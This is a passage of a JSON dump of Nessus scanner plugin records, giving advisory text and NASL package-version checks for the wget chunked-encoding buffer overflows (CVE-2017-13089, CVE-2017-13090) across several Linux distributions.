(rpm_check(release:\"SLES12\", sp:\"3\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"wget-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"wget-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"wget-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:50:44", "references": ["https://access.redhat.com/security/cve/cve-2017-13089", "https://access.redhat.com/errata/RHSA-2017:3075", "https://access.redhat.com/security/cve/cve-2017-13090"], "pluginID": "104205", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these issues.", "edition": 13, "reporter": "Tenable", "published": "2017-10-27T00:00:00", "title": "RHEL 7 : wget (RHSA-2017:3075)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:wget-debuginfo", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:wget", "cpe:/o:redhat:enterprise_linux:7.6"], "id": "REDHAT-RHSA-2017-3075.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104205", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:3075. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104205);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"RHSA\", value:\"2017:3075\");\n\n script_name(english:\"RHEL 7 : wget (RHSA-2017:3075)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in\nwget when processing chunked encoded HTTP responses. By tricking an\nunsuspecting user into connecting to a malicious HTTP server, an\nattacker could exploit these flaws to potentially execute arbitrary\ncode. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:3075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13090\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:3075\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-1.14-15.el7_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-1.14-15.el7_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-debuginfo-1.14-15.el7_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-15.el7_4.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:56:37", "references": ["https://oss.oracle.com/pipermail/el-errata/2017-October/007314.html"], "pluginID": "104200", "description": "From Red Hat Security Advisory 2017:3075 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these issues.", "edition": 9, "reporter": "Tenable", "published": "2017-10-27T00:00:00", "title": "Oracle Linux 7 : wget (ELSA-2017-3075)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-07-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:wget", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-3075.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:3075 and \n# Oracle Linux Security Advisory ELSA-2017-3075 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104200);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/07/25 14:27:30\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"RHSA\", value:\"2017:3075\");\n\n script_name(english:\"Oracle Linux 7 : wget (ELSA-2017-3075)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:3075 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* A stack-based and a heap-based buffer overflow flaws were found in\nwget when processing chunked encoded HTTP responses. By tricking an\nunsuspecting user into connecting to a malicious HTTP server, an\nattacker could exploit these flaws to potentially execute arbitrary\ncode. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-October/007314.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"wget-1.14-15.el7_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-28T02:07:08", "references": ["http://www.nessus.org/u?d4f07c28"], "pluginID": "104207", "description": "Security Fix(es) :\n\n - A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)", "edition": 8, "reporter": "Tenable", "published": "2017-10-27T00:00:00", "title": "Scientific Linux Security Update : wget on SL7.x x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-12-27T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20171026_WGET_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104207);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/12/27 10:05:37\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n\n script_name(english:\"Scientific Linux Security Update : wget on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A stack-based and a heap-based buffer overflow flaws\n were found in wget when processing chunked encoded HTTP\n responses. By tricking an unsuspecting user into\n connecting to a malicious HTTP server, an attacker could\n exploit these flaws to potentially execute arbitrary\n code. (CVE-2017-13089, CVE-2017-13090)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1710&L=scientific-linux-errata&F=&S=&P=18419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4f07c28\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-1.14-15.el7_4.1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-15.el7_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:39:03", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-10fbce01ec"], "pluginID": "105816", "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2018-01-15T00:00:00", "title": "Fedora 27 : wget (2017-10fbce01ec)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-02-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-10FBCE01EC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105816", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-10fbce01ec.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105816);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/01 15:56:51 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-10fbce01ec\");\n\n script_name(english:\"Fedora 27 : wget (2017-10fbce01ec)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-10fbce01ec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"wget-1.19.2-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-15T06:49:45", "references": ["http://www.nessus.org/u?72538c2d"], "pluginID": "104294", "description": "According to the versions of the wget package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 14, "reporter": "Tenable", "published": "2017-11-01T00:00:00", "title": "EulerOS 2.0 SP1 : wget (EulerOS-SA-2017-1269)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Huawei Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:wget", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1269.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104294", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104294);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2017-13089\",\n \"CVE-2017-13090\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : wget (EulerOS-SA-2017-1269)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the wget package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - A stack-based and a heap-based buffer overflow flaws\n were found in wget when processing chunked encoded HTTP\n responses. By tricking an unsuspecting user into\n connecting to a malicious HTTP server, an attacker\n could exploit these flaws to potentially execute\n arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1269\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72538c2d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n 